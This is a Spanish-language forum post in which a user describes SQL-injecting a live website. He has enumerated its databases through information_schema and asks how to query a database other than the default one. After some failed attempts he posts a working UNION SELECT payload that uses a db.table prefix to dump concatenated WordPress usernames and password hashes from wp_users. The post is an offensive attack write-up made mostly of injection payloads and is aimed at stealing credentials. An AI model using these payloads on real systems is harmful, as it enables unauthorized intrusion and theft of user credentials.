Autor
Bueno, al grano
Tengo una web que tiene muchas base de datos (gracias a information schema schemata).
Llamemosla
db1
db2
db3
db4
La web trabaja con al db1, por lo cual si yo hago algun
Código:
union+select+all+1,2,campo_que_no_existe,3+from+tabla.
me saldria
Table 'db1.campo_que_no_existe' doesn't exist
Ahora bien yo tengo las tablas y los campos de todas las base de datos, gracias al information schema (again XD').
Pero si yo intento hacer una consulta me dice que no existe la tabla ni el campo ni nada, pues claro estoy intentando hacer una peticion a la db2, pero esta por defecto las hace a las db1.
ahora bien leyendo y preguntando, descrubri el "USE DB", que sirve para selecionar una base de datos y luego hacer la consulta.
http://dev.mysql.com/doc/refman/5.0/es/use.html
Por EJ
Código:
mysql> USE db1;
mysql> SELECT COUNT(*) FROM mytable; # selects from db1.mytable
mysql> USE db2;
mysql> SELECT COUNT(*) FROM mytable; # selects from db2.mytable
MI Problema es¡¡¡
¿Como C"·$%&/? Combino la Sentencia USE en una Inyeccion SQL?
Asi no Funciona (Aunque Cambie el valor de la db a char o hexsql o dejo asi para que se entienda mejor)
and+1=0+union+select+all+1,2,3+from+wp_users+use+wordpress_cri
o... tampoco
and+1=0++use+wordpress_cri+and+union+select+all+1,2,3+from+wp_users
Espero que me puedan Ayudar
Saludos¡
OzX¡
concat(user_login,user_pass) <= CAMPOS
wordpres.cri <= db
wp_users <= tabla de la db
EDITADO LO LOGRE¡
+and+1=0+union+select+all+1,2,3,concat(user_login,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wordpress_cri.wp_users
:d
En línea
